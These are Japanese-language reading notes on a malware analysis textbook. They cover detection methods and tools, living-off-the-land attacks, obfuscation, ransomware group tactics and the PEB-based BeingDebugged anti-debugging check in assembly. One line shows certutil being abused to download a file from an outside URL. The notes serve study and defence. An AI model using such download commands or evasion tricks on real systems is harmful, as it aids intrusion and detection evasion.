マルウエアの教科書 増補改訂版 “超"基礎から高度な手口/解析のはじめ方まで完全網羅

sysinternals autoruns でピンク色の不明な発行元ソフトのチェック マルウェア検知の方法 シグネチャー検知：マルウェアの中身のバイナリの複数のバイナリ列を特徴点として検知 ヒューリスティック検知：マルウェアの中身や挙動を定義し合致すればマルウェアと判定、静的(動かさない)と動的(仮想的に動かす) YARAルールによるシグネチャ検知 yara32.exe YARA for Visual Studio Code Snatch セーフモードでデータを暗号化するランサムウェア SuperBackupManというサービスを登録 PowerShell で Get-Variableという引数を追加するとGet-Variable.exeを起動しようとする LOL攻撃 標準の正規プログラムを悪用する攻撃 rundll32.exe format.com wlmdr.exe bitsadmin.exe certreq.exe ftp.exe psr.exe certutil.exe -urlcache -split -f https://aaaa.org/eicar.com カレントフォルダにダウンロード formatc: /FS test Windowsシステムフォルダの utest.dll を実行しようとする パッキングと難読化処理 CFF＝順次処理を横並びの条件分岐と繰り返し処理に置き換える、平坦化 API hashing 呼び出すAPIの名前をハッシュ関数を用いて難読化する WindowsAPIはPE解析ツールにより容易に調べることができる 静的リンクと違い動的リンクではGetProcAddressでAPIを提供するアドレスを取得できる Ekansランサムウェア mds.honda.comの名前解決で内部アドレスを返したときのみ活動開始 オーダーメイド型ランサムウェア LockBit2.0 プリンターを使用して脅迫文を9999枚印刷する 静的解析と動的解析を妨害、自身を完全削除 UACパイパスで管理者権限を取得 ロシア言語圏だと感染しない ロシアのハッカーフォーラムで攻撃グループContiの攻撃マニュアルが流出 首謀者とアフィリエイトと呼ばれる攻撃の実働部隊で活動で得た金銭を分け合う セキュリティ診断ツールCobalt Strikeを悪用した攻撃方法 FileZillaやPuttyの悪用、プロキシツールngrokを使ったRPDの遠隔操作方法 RcloneによるオンラインストレージサービスMegaへのアップロード 初期アクセスブローカー IAB 不正に取得した被害組織へのアクセス情報をランサム攻撃実働部隊のアフィリエイトに提供する ProcessSpanwnControl プロセスの起動を常時監視する HollowsHunter、pe-sieve マルウェア検出のためのフリーツール OllyDbg フリーのデバッガー IsDebuggerPresent KernelBase.dllの中で実装 EXEファイルがメリー展開される際、PEBとTEBという構造体が入ってる　PEBはプロセス、TEDはスレッド PEBの中にプロセスが現在デバックされてるかどうかを示すBeingDebuggedの値を返している 32bitの場合TEBはFSレジスタに格納され、その銭湯から0x30の場所 fs:[30] にPEBのアドレスが格納 PEBアドレスから0x02にBeingDebuggedの値 MOV EAX,DWORD PTR FS:[30] MOVZX EAX,BYTE PTR DS:[EAX+2] うさみハリケーン XNTSV